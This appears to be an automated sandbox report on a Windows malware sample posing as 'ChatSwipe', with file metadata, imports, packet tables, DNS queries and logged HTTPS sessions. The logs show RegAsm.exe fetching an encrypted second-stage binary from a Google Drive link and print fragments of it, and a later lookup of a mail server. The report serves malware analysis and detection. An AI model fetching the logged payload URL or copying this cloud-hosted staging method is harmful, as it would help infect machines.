                                        .text0x10000x12b8c0x13000False0.521612870066data6.27868585878IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .data0x140000xcf40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .rsrc0x150000x5480x1000False0.130615234375data1.43798788343IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0x154200x128GLS_BINARY_LSB_FIRST
                                        RT_GROUP_ICON0x1540c0x14data
                                        RT_VERSION0x150f00x31cdataChineseTaiwan

                                        Imports

                                        DLLImport
                                        MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaAryConstruct2, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaStrToAnsi, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                        Version Infos

                                        DescriptionData
                                        Translation0x0404 0x04b0
                                        LegalCopyrightChatSwipe
                                        InternalNameUnseaming
                                        FileVersion4.04.0001
                                        CompanyNameChatSwipe
                                        LegalTrademarksChatSwipe
                                        CommentsChatSwipe
                                        ProductNameChatSwipe
                                        ProductVersion4.04.0001
                                        FileDescriptionChatSwipe
                                        OriginalFilenameUnseaming.exe

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        ChineseTaiwan

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 27, 2021 19:14:37.074604988 CEST49768443192.168.11.20142.250.185.174
                                        Sep 27, 2021 19:14:37.074686050 CEST44349768142.250.185.174192.168.11.20
                                        Sep 27, 2021 19:14:37.074886084 CEST49768443192.168.11.20142.250.185.174
                                        Sep 27, 2021 19:14:37.092822075 CEST49768443192.168.11.20142.250.185.174
                                        Sep 27, 2021 19:14:37.092876911 CEST44349768142.250.185.174192.168.11.20
                                        Sep 27, 2021 19:14:37.143996000 CEST44349768142.250.185.174192.168.11.20
                                        Sep 27, 2021 19:14:37.144198895 CEST49768443192.168.11.20142.250.185.174
                                        Sep 27, 2021 19:14:37.146965027 CEST44349768142.250.185.174192.168.11.20
                                        Sep 27, 2021 19:14:37.147222996 CEST49768443192.168.11.20142.250.185.174
                                        Sep 27, 2021 19:14:37.290890932 CEST49768443192.168.11.20142.250.185.174
                                        Sep 27, 2021 19:14:37.290956020 CEST44349768142.250.185.174192.168.11.20
                                        Sep 27, 2021 19:14:37.291861057 CEST44349768142.250.185.174192.168.11.20
                                        Sep 27, 2021 19:14:37.292049885 CEST49768443192.168.11.20142.250.185.174
                                        Sep 27, 2021 19:14:37.294972897 CEST49768443192.168.11.20142.250.185.174
                                        Sep 27, 2021 19:14:37.337888956 CEST44349768142.250.185.174192.168.11.20
                                        Sep 27, 2021 19:14:37.792932034 CEST44349768142.250.185.174192.168.11.20
                                        Sep 27, 2021 19:14:37.793046951 CEST44349768142.250.185.174192.168.11.20
                                        Sep 27, 2021 19:14:37.793112040 CEST49768443192.168.11.20142.250.185.174
                                        Sep 27, 2021 19:14:37.793158054 CEST49768443192.168.11.20142.250.185.174
                                        Sep 27, 2021 19:14:37.793703079 CEST44349768142.250.185.174192.168.11.20
                                        Sep 27, 2021 19:14:37.793874979 CEST49768443192.168.11.20142.250.185.174
                                        Sep 27, 2021 19:14:37.793895006 CEST44349768142.250.185.174192.168.11.20
                                        Sep 27, 2021 19:14:37.794006109 CEST49768443192.168.11.20142.250.185.174
                                        Sep 27, 2021 19:14:37.798510075 CEST49768443192.168.11.20142.250.185.174
                                        Sep 27, 2021 19:14:37.798577070 CEST44349768142.250.185.174192.168.11.20
                                        Sep 27, 2021 19:14:37.841370106 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:37.841438055 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:37.841638088 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:37.841993093 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:37.842047930 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:37.895595074 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:37.895768881 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:37.895828009 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:37.898549080 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:37.898739100 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:37.898880005 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:37.903896093 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:37.903908968 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:37.904185057 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:37.904318094 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:37.904627085 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:37.945852041 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.130479097 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.130645037 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.130673885 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.130698919 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.130714893 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.130897999 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.130930901 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.130949974 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.131117105 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.131148100 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.131824017 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.132013083 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.132044077 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.132352114 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.132575989 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.135277033 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.135488987 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.137522936 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.137784958 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.137825012 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.138040066 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.140064001 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.140297890 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.140336990 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.140491009 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.140517950 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.140662909 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.140676975 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.140705109 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.140831947 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.140857935 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.140875101 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.141020060 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.141170979 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.141329050 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.141366959 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.141529083 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.141555071 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.141705990 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.142019033 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.142165899 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.142203093 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.142411947 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.142458916 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.142678022 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.142924070 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.143075943 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.143110037 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.143321037 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.143368959 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.143590927 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.143834114 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.143995047 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.144036055 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.144237041 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.144268036 CEST44349770142.250.184.193192.168.11.20
                                        Sep 27, 2021 19:14:38.144417048 CEST49770443192.168.11.20142.250.184.193
                                        Sep 27, 2021 19:14:38.144516945 CEST44349770142.250.184.193192.168.11.20

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 27, 2021 19:13:46.985615969 CEST5469553192.168.11.201.1.1.1
                                        Sep 27, 2021 19:13:47.106332064 CEST53546951.1.1.1192.168.11.20
                                        Sep 27, 2021 19:13:53.505419016 CEST6322253192.168.11.201.1.1.1
                                        Sep 27, 2021 19:13:53.514544964 CEST53632221.1.1.1192.168.11.20
                                        Sep 27, 2021 19:13:54.378580093 CEST5192653192.168.11.201.1.1.1
                                        Sep 27, 2021 19:13:54.387257099 CEST53519261.1.1.1192.168.11.20
                                        Sep 27, 2021 19:13:54.395916939 CEST6056253192.168.11.201.1.1.1
                                        Sep 27, 2021 19:13:54.404516935 CEST53605621.1.1.1192.168.11.20
                                        Sep 27, 2021 19:13:54.960269928 CEST6491753192.168.11.201.1.1.1
                                        Sep 27, 2021 19:13:54.969388962 CEST53649171.1.1.1192.168.11.20
                                        Sep 27, 2021 19:13:57.046175957 CEST6273553192.168.11.201.1.1.1
                                        Sep 27, 2021 19:13:57.054824114 CEST53627351.1.1.1192.168.11.20
                                        Sep 27, 2021 19:14:37.053723097 CEST6283553192.168.11.201.1.1.1
                                        Sep 27, 2021 19:14:37.062295914 CEST53628351.1.1.1192.168.11.20
                                        Sep 27, 2021 19:14:37.792082071 CEST5090953192.168.11.201.1.1.1
                                        Sep 27, 2021 19:14:37.798989058 CEST6235753192.168.11.201.1.1.1
                                        Sep 27, 2021 19:14:37.800715923 CEST53509091.1.1.1192.168.11.20
                                        Sep 27, 2021 19:14:37.840061903 CEST53623571.1.1.1192.168.11.20
                                        Sep 27, 2021 19:15:27.091559887 CEST5071053192.168.11.201.1.1.1
                                        Sep 27, 2021 19:15:27.099625111 CEST53507101.1.1.1192.168.11.20
                                        Sep 27, 2021 19:15:57.111104012 CEST5281853192.168.11.201.1.1.1
                                        Sep 27, 2021 19:15:57.119883060 CEST53528181.1.1.1192.168.11.20
                                        Sep 27, 2021 19:16:13.309386015 CEST6376153192.168.11.201.1.1.1
                                        Sep 27, 2021 19:16:13.347560883 CEST53637611.1.1.1192.168.11.20
                                        Sep 27, 2021 19:19:27.934781075 CEST5295053192.168.11.201.1.1.1
                                        Sep 27, 2021 19:19:27.943100929 CEST53529501.1.1.1192.168.11.20
                                        Sep 27, 2021 19:19:28.132550955 CEST6366053192.168.11.201.1.1.1
                                        Sep 27, 2021 19:19:28.141120911 CEST53636601.1.1.1192.168.11.20
                                        Sep 27, 2021 19:19:28.354928017 CEST5007753192.168.11.201.1.1.1
                                        Sep 27, 2021 19:19:28.363957882 CEST53500771.1.1.1192.168.11.20
                                        Sep 27, 2021 19:19:42.233016968 CEST6374153192.168.11.201.1.1.1
                                        Sep 27, 2021 19:19:42.242810965 CEST53637411.1.1.1192.168.11.20
                                        Sep 27, 2021 19:20:36.971225023 CEST6078253192.168.11.201.1.1.1
                                        Sep 27, 2021 19:20:36.979845047 CEST53607821.1.1.1192.168.11.20
                                        Sep 27, 2021 19:21:12.049505949 CEST5414053192.168.11.201.1.1.1
                                        Sep 27, 2021 19:21:12.059145927 CEST53541401.1.1.1192.168.11.20

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Sep 27, 2021 19:14:37.053723097 CEST192.168.11.201.1.1.10xfda6Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                        Sep 27, 2021 19:14:37.798989058 CEST192.168.11.201.1.1.10xcffbStandard query (0)doc-0c-50-docs.googleusercontent.comA (IP address)IN (0x0001)
                                        Sep 27, 2021 19:16:13.309386015 CEST192.168.11.201.1.1.10xf3efStandard query (0)mail.reyesyasociados.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Sep 27, 2021 19:14:37.062295914 CEST1.1.1.1192.168.11.200xfda6No error (0)drive.google.com142.250.185.174A (IP address)IN (0x0001)
                                        Sep 27, 2021 19:14:37.840061903 CEST1.1.1.1192.168.11.200xcffbNo error (0)doc-0c-50-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                        Sep 27, 2021 19:14:37.840061903 CEST1.1.1.1192.168.11.200xcffbNo error (0)googlehosted.l.googleusercontent.com142.250.184.193A (IP address)IN (0x0001)
                                        Sep 27, 2021 19:16:13.347560883 CEST1.1.1.1192.168.11.200xf3efNo error (0)mail.reyesyasociados.com109.169.39.245A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • drive.google.com
                                        • doc-0c-50-docs.googleusercontent.com

                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.11.2049768142.250.185.174443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampkBytes transferredDirectionData
                                        2021-09-27 17:14:37 UTC0OUTGET /uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3 HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: drive.google.com
                                        Cache-Control: no-cache
                                        2021-09-27 17:14:37 UTC0INHTTP/1.1 302 Moved Temporarily
                                        Content-Type: text/html; charset=UTF-8
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Mon, 27 Sep 2021 17:14:37 GMT
                                        Location: https://doc-0c-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0kmp839hage8unguv37m9lhvdkbnieei/1632762825000/00519186742208262786/*/1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3?e=download
                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                        Content-Security-Policy: script-src 'nonce-ugZ9iW7Eqtv4HXkds1FO1A' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        X-XSS-Protection: 1; mode=block
                                        Server: GSE
                                        Set-Cookie: NID=511=PtQBbc7JXmab9vuQANNudl4s8Pk1i-CwFw1cJVWhhh9k8JbF4YvAjsqso0DHU1HlX3mwTvbzMXCfg8OPEW5S-WOzyXYfLZegC5JxN0hRPFU5wOWbtM1T1QopvZ3ltIqTvTM_r3cPxHL2Z6z5sR4JvG-pnVs43GL-kM-FW-ituX8; expires=Tue, 29-Mar-2022 17:14:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                        Accept-Ranges: none
                                        Vary: Accept-Encoding
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        2021-09-27 17:14:37 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 63 2d 35 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 30 6b 6d 70
                                        Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0c-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0kmp
                                        2021-09-27 17:14:37 UTC1INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.11.2049770142.250.184.193443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampkBytes transferredDirectionData
                                        2021-09-27 17:14:37 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0kmp839hage8unguv37m9lhvdkbnieei/1632762825000/00519186742208262786/*/1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3?e=download HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Cache-Control: no-cache
                                        Host: doc-0c-50-docs.googleusercontent.com
                                        Connection: Keep-Alive
                                        2021-09-27 17:14:38 UTC2INHTTP/1.1 200 OK
                                        X-GUploader-UploadID: ADPycdtYG_sWIbWHzpWnCMr_u_x6iuX7mOeggrR7koEXnCB0T0pPZDtqIbJxnQN1wjyw1WQS79A561XBHfEzi1yArSi7C0qcdA
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                        Access-Control-Allow-Methods: GET,OPTIONS
                                        Content-Type: application/octet-stream
                                        Content-Disposition: attachment;filename="nappy_HEdYFsegR131.bin";filename*=UTF-8''nappy_HEdYFsegR131.bin
                                        Date: Mon, 27 Sep 2021 17:14:38 GMT
                                        Expires: Mon, 27 Sep 2021 17:14:38 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=guKTWg==
                                        Content-Length: 221760
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                        Connection: close
                                        2021-09-27 17:14:38 UTC5INData Raw: 90 cb 66 2a 30 cf b0 57 2c 87 c1 2a 03 36 5f 5c 8b 49 38 07 6e 4c 4a b0 db fa 1d fc 9b 4b 18 e1 fa 1a 36 51 c3 09 fb b8 bf 7c dd 35 60 7a 6e d3 fc d4 ec 23 16 ab e2 83 11 07 a6 87 4b 1d da f7 70 86 97 c9 6f ba 51 54 b1 46 f5 8b 4c b9 e6 f0 2b f3 5e 93 51 9d bd 3a 3c 83 48 2a 42 ad 3f 78 43 2c 01 9c ca 18 04 98 63 b6 c1 8b d8 c4 35 b7 c3 d6 ae e0 cd 45 23 5d f0 2b 66 bb ec 96 e6 21 ce c6 62 ef 92 70 b6 1d ff aa 08 8e 9f ae a7 d8 32 3f b0 36 7a 7e d0 ac b3 39 3d 95 0b 2d 84 c7 bf d4 68 e7 a9 5f 21 0c 62 97 91 87 2d b0 75 47 4c f8 c0 0d 8b 24 18 a0 d8 34 b7 4f 37 ce e7 10 55 2e 8e 40 96 7b 91 1c bd 97 4e 68 ea 58 45 81 ba 98 f4 3c 64 b0 d9 8b 27 61 b8 bd fb 3a 17 1b 1c 88 17 c5 63 e9 7c 96 bd fa 18 55 af 59 3e 18 cd 13 b4 3c f3 26 2e ad 4b 36 30 58 f0 c3 bb
                                        Data Ascii: f*0W,*6_\I8nLJK6Q|5`zn#KpoQTFL+^Q:<H*B?xC,c5E#]+f!bp2?6z~9=-h_!b-uGL$4O7U.@{NhXE<d'a:c|UY><&.K60X
                                        2021-09-27 17:14:38 UTC9INData Raw: 46 bc d9 7c 76 04 af 19 8e 99 c0 a8 3c bf 68 2a eb cb af 33 61 4d 9d 1e 04 65 f5 e7 dc 1f 69 87 ae 96 3e 69 ec ae f2 20 a9 08 6c cc 6d 80 2c 15 e6 c9 93 48 76 eb 35 9e 40 6c d4 ed d2 95 4f 21 4d 27 87 48 00 43 44 b8 02 57 f9 2b e9 c4 1a 0f d3 94 62 53 34 9b b4 2e 24 fc 6a ad ab 70 f3 2f bc 31 15 31 0c 6d 37 1c d1 3d b7 4c 20 29 93 e1 55 fb eb 68 6b 51 f7 3d 14 30 a7 28 90 e2 f7 a5 6f 91 da 3f 7d 6a e8 32 15 a7 4a 68 44 01 d1 a2 3a 86 38 2b 29 43 53 c9 27 46 83 ca ae 01 da 4b 2f 45 1f 5d 3c 0b 98 22 de 0e 4c a8 d5 d3 0d 09 ab 3b 16 3b 63 6e 11 ec dd b9 e8 b2 12 76 ce f6 44 ab 1a b6 1c 49 8d 03 c2 52 d9 07 a0 3c 4d 5a 5e 66 14 a4 9d 89 8d f1 7c 33 38 1b 82 75 2f b9 86 aa 63 ed 40 02 d4 9d da 9f 40 44 06 40 eb 4d a9 c0 f9 16 fd 53 85 6c c7 6c 06 0e c8 9c d2
                                        Data Ascii: F|v<h*3aMei>i lm,Hv5@lO!M'HCDW+bS4.$jp/11m7=L )UhkQ=0(o?}j2JhD:8+)CS'FK/E]<"L;;cnvDIR<MZ^f|38u/c@@D@MSll
                                        2021-09-27 17:14:38 UTC12INData Raw: 17 1c 55 f9 de b5 35 f6 df 52 87 09 40 10 ef a5 1f 72 fb 6e 3e 16 14 ac 44 ae 86 9d 0c c7 c0 3d bb e7 ab 94 f5 5b ab 04 a9 c9 d4 23 83 20 ae ed 6d 53 1e dc 1c 6f 71 12 4d ef 1f fe b3 e3 b0 3e 1e 0b 2e fb 3a 6e 59 40 87 94 1b bd 9b 54 92 db 6e 78 19 9f da c4 5b 12 fd ae f7 cd c1 00 9b c2 9f 9b 9a c5 33 ec 81 c4 e7 f6 15 3b 0c f6 17 a3 25 9d 0a 02 16 3c eb d7 c6 08 67 0e d4 32 67 21 59 e7 ed 70 ca 7d 4e 4e f0 bd e3 41 9e e2 9b 66 b1 6d 9b 8c 4b ac 9d 90 a4 4a 2a 11 bf 04 fa 62 f1 0b 9d 86 79 4e 78 d3 d2 7b 03 43 0d 2d 77 d3 0a fe ee 15 50 bc 1c b1 a5 49 5a 73 7d c4 d5 64 72 16 0e 64 d4 0e d0 8c 2f 9e 59 1c d8 84 2b f6 ac 7d 7c b1 8b d8 ea e0 33 07 61 e8 b1 94 23 65 28 63 1b ff 73 4c fe 41 5d a3 ed 0d ff 66 8a b6 68 3b 24 5e 37 ea af ba de 2d 2e c8 6a 71 aa
                                        Data Ascii: U5R@rn>D=[# mSoqM>.:nY@Tnx[3;%<g2g!Yp}NNAfmKJ*byNx{C-wPIZs}drd/Y+}|3a#e(csLA]fh;$^7-.jq
